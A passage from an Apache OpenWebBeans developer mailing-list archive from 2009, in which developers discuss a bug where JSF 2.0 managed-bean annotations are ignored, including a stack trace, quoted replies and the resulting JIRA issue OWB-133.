org.apache.webbeans.context.AbstractContext.get(AbstractContext.java:147= ) >> =A0 =A0 =A0 =A0at >> org.apache.webbeans.intercept.InterceptorHandler.invoke(InterceptorHandl= er.java:65) >> =A0 =A0 =A0 =A0at >> de.jug.cologne.webbeans.CocktailBean_$$_javassist_1.isInShopping(Cocktai= lBean_$$_javassist_1.java) >> =A0 =A0 =A0 =A0at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Me= thod) >> =A0 =A0 =A0 =A0at >> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.jav= a:39) >> =A0 =A0 =A0 =A0at >> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessor= Impl.java:25) >> =A0 =A0 =A0 =A0at java.lang.reflect.Method.invoke(Method.java:597) >> =A0 =A0 =A0 =A0at javax.el.BeanELResolver.getValue(BeanELResolver.java:2= 93) >> =A0 =A0 =A0 =A0at >> javax.el.CompositeELResolver.getValue(CompositeELResolver.java:175) >> =A0 =A0 =A0 =A0at >> com.sun.faces.el.FacesCompositeELResolver.getValue(FacesCompositeELResol= ver.java:72) >> =A0 =A0 =A0 =A0at com.sun.el.parser.AstValue.getValue(AstValue.java:138) >> =A0 =A0 =A0 =A0at >> com.sun.el.ValueExpressionImpl.getValue(ValueExpressionImpl.java:206) >> =A0 =A0 =A0 =A0at >> com.sun.faces.facelets.el.TagValueExpression.getValue(TagValueExpression= .java:102) >> =A0 =A0 =A0 =A0at >> javax.faces.component.ComponentStateHelper.eval(ComponentStateHelper.jav= a:181) >> =A0 =A0 =A0 =A0at >> javax.faces.component.UIComponentBase.isRendered(UIComponentBase.java:41= 2) >> =A0 =A0 =A0 =A0at >> javax.faces.component.UIComponent.encodeAll(UIComponent.java:1603) >> =A0 =A0 =A0 =A0at javax.faces.render.Renderer.encodeChildren(Renderer.ja= va:168) >> =A0 =A0 =A0 =A0at >> javax.faces.component.UIComponentBase.encodeChildren(UIComponentBase.jav= a:844) >> =A0 =A0 =A0 =A0at >> javax.faces.component.UIComponent.encodeAll(UIComponent.java:1609) >> =A0 =A0 =A0 =A0at >> javax.faces.component.UIComponent.encodeAll(UIComponent.java:1612) >> =A0 =A0 =A0 =A0at >> javax.faces.component.UIComponent.encodeAll(UIComponent.java:1612) >> =A0 =A0 =A0 =A0at >> com.sun.faces.application.view.FaceletViewHandlingStrategy.renderView(Fa= celetViewHandlingStrategy.java:271) >> =A0 =A0 =A0 =A0at >> com.sun.faces.application.view.MultiViewHandler.renderView(MultiViewHand= ler.java:126) >> =A0 =A0 =A0 =A0at >> com.sun.faces.lifecycle.RenderResponsePhase.execute(RenderResponsePhase.= java:124) >> =A0 =A0 =A0 =A0at com.sun.faces.lifecycle.Phase.doPhase(Phase.java:103) >> =A0 =A0 =A0 =A0at >> com.sun.faces.lifecycle.LifecycleImpl.render(LifecycleImpl.java:139) >> =A0 =A0 =A0 =A0at javax.faces.webapp.FacesServlet.service(FacesServlet.j= ava:311) >> =A0 =A0 =A0 =A0at >> org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:502) >> >> I am not exactly sure what the really means. No I have done no >> investigations :-) >> >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:11:34 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57711 invoked from network); 26 Aug 2009 15:11:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:11:34 -0000 Received: (qmail 44149 invoked by uid 500); 26 Aug 2009 15:11:34 -0000 Delivered-To: [email protected] Received: (qmail 44136 invoked by uid 500); 26 Aug 2009 15:11:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44126 invoked by uid 99); 26 Aug 2009 15:11:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:11:34 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f215.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:11:23 +0000 Received: by ewy11 with SMTP id 11so250494ewy.35 for <[email protected]>; Wed, 26 Aug 2009 08:11:02 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=56ZChREj0jinizZEhwWE9BLfomT+xIXPvBp68nN0FEI=; b=K/DpKv0QJjl2EUlCR6WH5QxPXhKd05eeZOUR1aQNPPWKhMcK9XN3xwVGU6QUYyr5Iw 1grgWCoyU1x+Jl1vuXpUJfnpe8TuRy/PcSfd4W13Z3zXYqgqz9gs75TxYvqW5ElGApZI ITELOEqITQ9qzY5ANZ7FWlq6+D/FgPFPFb6bI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=Zd5neUuOFOL/RMgpbh7wQvnIy2E7okTs4iOsISCC47Swx4F682MA5+LmF7MysBrWwE GSXFkdiM8ocD2H1s/SV11PPgW5/arC3bd0CUieque1q2vW+O0BzgY9NrDyaxzQGQqhMD iWEdu4IHvdj2WPlgoAWQBaOB+5Laonj/EG83Q= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id l16mr5860114ebl.9.1251299462003; Wed, 26 Aug 2009 08:11:02 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 17:11:01 +0200 X-Google-Sender-Auth: 8fec2b24a73ddd40 Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org has no effect. The beast can't find the JSF beans. Due to lack of time, I am going with JSF 2.0 standalone. Question is: as it was working the current behavior is a regression, has there been any testing on OBW + JSF 2.0 ? -Matthias On Wed, Aug 26, 2009 at 3:45 PM, Gurkan Erdogdu<[email protected]> wrote: > It must not eat. > > But one point, > > You still use old XML configuration file format. As a default OWB uses new > XML format. Add > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties > > in your project resources/META-INF/openwebbeans folder and sure that all > libraries are ok. > > You can look necessary libs from guess.war . You can create it from mvn > package -Pjetty. > > --Gurkan > > > 2009/8/26 Matthias Wessendorf <[email protected]> > >> Hi, >> >> is it possible that the current trunk is _eating_ JSF 2.0 annotations ? >> >> <someCode> >> ... >> import javax.faces.bean.ManagedBean; >> import javax.faces.bean.SessionScoped; >> >> @ManagedBean(name="playersBean") >> @SessionScoped >> public class ViewParamsBean >> { >> ... >> </someCode> >> >> In June (before reflecting the javax.enterprise.context changes) it was >> working. >> Now expressions like #{playersBean} are simply ignored ;-) >> >> Demo project is here: >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >> >> -Matthias >> >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com > -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:15:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63450 invoked from network); 26 Aug 2009 15:15:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:15:23 -0000 Received: (qmail 57966 invoked by uid 500); 26 Aug 2009 15:15:23 -0000 Delivered-To: [email protected] Received: (qmail 57952 invoked by uid 500); 26 Aug 2009 15:15:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57942 invoked by uid 99); 26 Aug 2009 15:15:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:15:22 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f215.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:15:10 +0000 Received: by ewy11 with SMTP id 11so254522ewy.35 for <[email protected]>; Wed, 26 Aug 2009 08:14:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type; bh=KiAVLSgvfCdQC9U6gCu+DNkHlXJL7ZSpuluS/WL9PyM=; b=FIwtjSK/pB7Lt78Gjz5ETNWfWM31poKyQpzyKrXJwKuh8nT6JkJ0jMAaQsaxpu2e0r cI6cy59u2g05azTsKM6/8sV3T2AZ/w7f5nbcglHYoF5fAovRoQGEC8QuyBjpcc/KdwKd rQb3BcfpaJJIgxQoiDbJAdLar+ACtCNqF4/WA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type; b=mftD/mNn8+VPqaM48u7SNq64AU/S51J0ys3NEHRDfD33V6hP9oiQCm1seSmcjvMxHV CNDJy/yEGeymXefVf9tfCicqLfisojwpFwm+W+gmB2qirzl508w6NclxKQJdgg/7KZWv 5psQ0pi/0izIs7rfwaMBSM1Gd8ml5V/wh8jmw= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id s8mr8352927eba.69.1251299690690; Wed, 26 Aug 2009 08:14:50 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 17:14:50 +0200 X-Google-Sender-Auth: 34abd625706a13b2 Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Aug 26, 2009 at 5:11 PM, Matthias Wessendorf<[email protected]> wrote: > has no effect. The beast can't find the JSF beans. > Due to lack of time, I am going with JSF 2.0 standalone. funny. simply replacing the JSF 2.0 annotions by javax.enterprise.* works... > > Question is: as it was working the current behavior is a regression, > has there been any testing on OBW + JSF 2.0 ? > > -Matthias > > On Wed, Aug 26, 2009 at 3:45 PM, Gurkan Erdogdu<[email protected]> wrote: >> It must not eat. >> >> But one point, >> >> You still use old XML configuration file format. As a default OWB uses new >> XML format. Add >> https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties >> >> in your project resources/META-INF/openwebbeans folder and sure that all >> libraries are ok. >> >> You can look necessary libs from guess.war . You can create it from mvn >> package -Pjetty. >> >> --Gurkan >> >> >> 2009/8/26 Matthias Wessendorf <[email protected]> >> >>> Hi, >>> >>> is it possible that the current trunk is _eating_ JSF 2.0 annotations ? >>> >>> <someCode> >>> ... >>> import javax.faces.bean.ManagedBean; >>> import javax.faces.bean.SessionScoped; >>> >>> @ManagedBean(name="playersBean") >>> @SessionScoped >>> public class ViewParamsBean >>> { >>> ... >>> </someCode> >>> >>> In June (before reflecting the javax.enterprise.context changes) it was >>> working. >>> Now expressions like #{playersBean} are simply ignored ;-) >>> >>> Demo project is here: >>> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >>> >>> -Matthias >>> >>> >>> -- >>> Matthias Wessendorf >>> >>> blog: http://matthiaswessendorf.wordpress.com/ >>> sessions: http://www.slideshare.net/mwessendorf >>> twitter: http://twitter.com/mwessendorf >>> >> >> >> >> -- >> Gurkan Erdogdu >> http://gurkanerdogdu.blogspot.com >> > > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:18:00 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67224 invoked from network); 26 Aug 2009 15:18:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:18:00 -0000 Received: (qmail 60153 invoked by uid 500); 26 Aug 2009 15:18:00 -0000 Delivered-To: [email protected] Received: (qmail 60132 invoked by uid 500); 26 Aug 2009 15:18:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60122 invoked by uid 99); 26 Aug 2009 15:18:00 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:18:00 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27802.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 26 Aug 2009 15:17:48 +0000 Received: (qmail 5681 invoked by uid 60001); 26 Aug 2009 15:17:26 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1251299846; bh=fSJ/0D/2H22ITByD72DTBgIUKidzC9HCfBr7qjk3o7E=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=puNdHFVf5Uv/xP1rlgRMJSHBAY7jjoNHiQryZidtGkAcMcJBn1DjQrDHpTqNNvaDoZGFv0V5U2jGlc5NJM+4La9kEGeTCnp7Y0Xb1G/ldTOA/H6a8ykH2YnoSc7hdSZBuRuPvP7rl+oRRoczV7hbhvrA+UX8yH3UK1N8ZGlJmho= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=4sW9EHVQxo9AOmJRvm/iPnJMfNVosq68gbk3x9WagXlTIkwxmBroPdvmB5XJRkmd/aUstYxljoVvVjeD9KLFehPIzH1m3Ncjra/i676KtODa2D/yrwweaQz+dJrtBQQRdPwUMc6Uq1uXggG2wYdNAiWPq+RukxfWEDxg/cb2skw=; Message-ID: <{{EMAIL+PHONE}}> X-YMail-OSG: wjyxbRQVM1kje8msMy1ugYEpKpZjRJOxScJtuDxKGE5_pZFL1QmoSdClJIpLIISIt.3MYeryHOwCGO4hArrGaCLmsi5SmuibyqlZ0zZ6N7ClWIykvFjj8nghY2sX7cym1MtdoKUK5dma9ErMRB9bQfX8pb7eoslENL9Nx9Ltt6fHrfN.gxjQh6fMdPywmeCdRN4wJDim__OMY8917WXuHkxtuaIMLx_oS3k8pmvM8nS.Mlje09kJWKWVcF3En0JfEbnvufhhumOBP.4CDeMjd0RPLY94pfxb5NoTWQ0WDdhPBKbYa4p3xNrLBrHXkhdFpN2qCz.D0Spn5BqBfz.1raNO1.v11w46sYtgejP4EfvQvCc98pANpukqe8NnKzHBgnTTeuLZ Received: from [161.129.204.104] by web27802.mail.ukl.yahoo.com via HTTP; Wed, 26 Aug 2009 15:17:26 GMT X-Mailer: YahooMailClassic/6.1.2 YahooMailWebService/0.7.338.2 Date: Wed, 26 Aug 2009 15:17:26 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org for what I know (discussion on wb-dev) JSF apps should use JSR-299 @ScopeType annotated scopes (renamed to @NormalScope in the latest spec) and not faces scopes. I did hope that we could unify all scopes by generally using JSR-330 javax.inject.Scope in all EE fields. But that will not work until JSR-299 also recognizes and treats JSR-330 scopes as normal scopes. LieGrue, strub --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > From: Matthias Wessendorf <[email protected]> > Subject: Re: WebBeans "eating" JSF 2.0 annotations ? > To: [email protected] > Date: Wednesday, August 26, 2009, 5:11 PM > has no effect. The beast can't find > the JSF beans. > Due to lack of time, I am going with JSF 2.0 standalone. > > Question is: as it was working the current behavior is a > regression, > has there been any testing on OBW + JSF 2.0 ? > > -Matthias > > On Wed, Aug 26, 2009 at 3:45 PM, Gurkan Erdogdu<[email protected]> > wrote: > > It must not eat. > > > > But one point, > > > > You still use old XML configuration file format. As a > default OWB uses new > > XML format. Add > > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties > > > > in your project resources/META-INF/openwebbeans folder > and sure that all > > libraries are ok. > > > > You can look necessary libs from guess.war . You can > create it from mvn > > package -Pjetty. > > > > --Gurkan > > > > > > 2009/8/26 Matthias Wessendorf <[email protected]> > > > >> Hi, > >> > >> is it possible that the current trunk is _eating_ > JSF 2.0 annotations ? > >> > >> <someCode> > >> ... > >> import javax.faces.bean.ManagedBean; > >> import javax.faces.bean.SessionScoped; > >> > >> @ManagedBean(name="playersBean") > >> @SessionScoped > >> public class ViewParamsBean > >> { > >> ... > >> </someCode> > >> > >> In June (before reflecting the > javax.enterprise.context changes) it was > >> working. > >> Now expressions like #{playersBean} are simply > ignored ;-) > >> > >> Demo project is here: > >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ > >> > >> -Matthias > >> > >> > >> -- > >> Matthias Wessendorf > >> > >> blog: http://matthiaswessendorf.wordpress.com/ > >> sessions: http://www.slideshare.net/mwessendorf > >> twitter: http://twitter.com/mwessendorf > >> > > > > > > > > -- > > Gurkan Erdogdu > > http://gurkanerdogdu.blogspot.com > > > > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > From [email protected] Wed Aug 26 15:22:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82651 invoked from network); 26 Aug 2009 15:22:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:22:29 -0000 Received: (qmail 79808 invoked by uid 500); 26 Aug 2009 15:22:29 -0000 Delivered-To: [email protected] Received: (qmail 79798 invoked by uid 500); 26 Aug 2009 15:22:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79783 invoked by uid 99); 26 Aug 2009 15:22:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:22:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:22:19 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5511C234C04B for <[email protected]>; Wed, 26 Aug 2009 08:21:59 -0700 (PDT) Message-ID: <287242674.1251300119347.JavaMail.jira@brutus> Date: Wed, 26 Aug 2009 08:21:59 -0700 (PDT) From: =?utf-8?Q?Matthias_We=C3=9Fendorf_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-133) OWB ignores the JSF 2.0 annotions MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org OWB ignores the JSF 2.0 annotions=20 ---------------------------------- Key: OWB-133 URL: https://issues.apache.org/jira/browse/OWB-133 Project: OpenWebBeans Issue Type: Bug Components: Injection and Lookup Reporter: Matthias We=C3=9Fendorf Assignee: Gurkan Erdogdu Priority: Critical using Managed Beans with JSF 2.0 annotations has no effect, as OWB simply i= gnores them See demo project (test-case) here: https://facesgoodies.googlecode.com/svn/CGN/trunk/ replacing the JSF annotations by javax.enterprise.** fixes that. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Aug 26 15:24:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83006 invoked from network); 26 Aug 2009 15:24:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:24:25 -0000 Received: (qmail 81337 invoked by uid 500); 26 Aug 2009 15:24:25 -0000 Delivered-To: [email protected] Received: (qmail 81316 invoked by uid 500); 26 Aug 2009 15:24:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81298 invoked by uid 99); 26 Aug 2009 15:24:25 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:24:25 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ey-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:24:13 +0000 Received: by ey-out-1920.google.com with SMTP id 3so185145eyh.4 for <[email protected]>; Wed, 26 Aug 2009 08:23:53 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=+InUwlLhPuL2YziesjFNb/RcCuv/g4eqkLCh8E7Fc5k=; b=PC8ZRIxc37uo6M/H8kgEIivxnuxgfwgX+v/lo3pMw7GaQX1n2G9IQ8UZl7VdiXmnUq O3HcqS+r1Bl0W4ZeTG5fOpnD+DmaAzjQwQNWiBwKGvgBi5tIuZrcg92iZHOM/0lzHdNx p3Jbt9W9WrJDsecIpGqL2v3sy3xAaU53py9lM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=iYX93u0LoqN/FesKcrZ05vVuWsI/04GPo7CSMLpkGDuHUac3v68rcUh+uHui69niJm 9UQEK85TcgEhlNyPck7i0F7ZoN03iMhN1RqSZV7PH5obEWBx3VdIDydzYfJfC/HEQ/AZ KxDPZM20lkRtSEr0xx/PcYM7aSFwMmdcMwdBY= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id g17mr8444768ebd.9.1251300232962; Wed, 26 Aug 2009 08:23:52 -0700 (PDT) In-Reply-To: <{{EMAIL+PHONE}}> References: <[email protected]> <{{EMAIL+PHONE}}> Date: Wed, 26 Aug 2009 17:23:52 +0200 X-Google-Sender-Auth: a62160516db7de85 Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Aug 26, 2009 at 5:17 PM, Mark Struberg<[email protected]> wrote: > for what I know (discussion on wb-dev) JSF apps should use JSR-299 @Scope= Type annotated scopes (renamed to @NormalScope in the latest spec) and not = faces scopes. I did hope that we could unify all scopes by generally using = JSR-330 javax.inject.Scope in all EE fields. But that will not work until J= SR-299 also recognizes and treats JSR-330 scopes as normal scopes. > WTF ? :) It is kinda odd that JSF 2.0 has should use the 299 stuff. Standalone, ok all fine (not tested). But even if there are both in the game jsf2.0 and 299, they should just work (or at least I should get a warning that the bean is using a (good) -sorry- incorrect... annotati= on. Basically this is a total mess. Annontations work standalone, but not when adding some heavyweight stuff (like 299) to the game ? Oh boy... -Matthias > LieGrue, > strub > > > --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > >> From: Matthias Wessendorf <[email protected]> >> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >> To: [email protected] >> Date: Wednesday, August 26, 2009, 5:11 PM >> has no effect. The beast can't find >> the JSF beans. >> Due to lack of time, I am going with JSF 2.0 standalone. >> >> Question is: as it was working the current behavior is a >> regression, >> has there been any testing on OBW + JSF 2.0 ? >> >> -Matthias >> >> On Wed, Aug 26, 2009 at 3:45 PM, Gurkan Erdogdu<[email protected]= > >> wrote: >> > It must not eat. >> > >> > But one point, >> > >> > You still use old XML configuration file format. As a >> default OWB uses new >> > XML format. Add >> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/= guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties >> > >> > in your project resources/META-INF/openwebbeans folder >> and sure that all >> > libraries are ok. >> > >> > You can look necessary libs from guess.war . You can >> create it from mvn >> > package -Pjetty. >> > >> > --Gurkan >> > >> > >> > 2009/8/26 Matthias Wessendorf <[email protected]> >> > >> >> Hi, >> >> >> >> is it possible that the current trunk is _eating_ >> JSF 2.0 annotations ? >> >> >> >> <someCode> >> >> ... >> >> import javax.faces.bean.ManagedBean; >> >> import javax.faces.bean.SessionScoped; >> >> >> >> @ManagedBean(name=3D"playersBean") >> >> @SessionScoped >> >> public class ViewParamsBean >> >> { >> >> ... >> >> </someCode> >> >> >> >> In June (before reflecting the >> javax.enterprise.context changes) it was >> >> working. >> >> Now expressions like #{playersBean} are simply >> ignored ;-) >> >> >> >> Demo project is here: >> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >> >> >> >> -Matthias >> >> >> >> >> >> -- >> >> Matthias Wessendorf >> >> >> >> blog: http://matthiaswessendorf.wordpress.com/ >> >> sessions: http://www.slideshare.net/mwessendorf >> >> twitter: http://twitter.com/mwessendorf >> >> >> > >> > >> > >> > -- >> > Gurkan Erdogdu >> > http://gurkanerdogdu.blogspot.com >> > >> >> >> >> -- >> Matthias Wessendorf >> >> blog: http://matthiaswessendorf.wordpress.com/ >> sessions: http://www.slideshare.net/mwessendorf >> twitter: http://twitter.com/mwessendorf >> > > > > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:26:49 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83695 invoked from network); 26 Aug 2009 15:26:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:26:49 -0000 Received: (qmail 87777 invoked by uid 500); 26 Aug 2009 15:26:49 -0000 Delivered-To: [email protected] Received: (qmail 87768 invoked by uid 500); 26 Aug 2009 15:26:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87758 invoked by uid 99); 26 Aug 2009 15:26:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:26:49 +0000 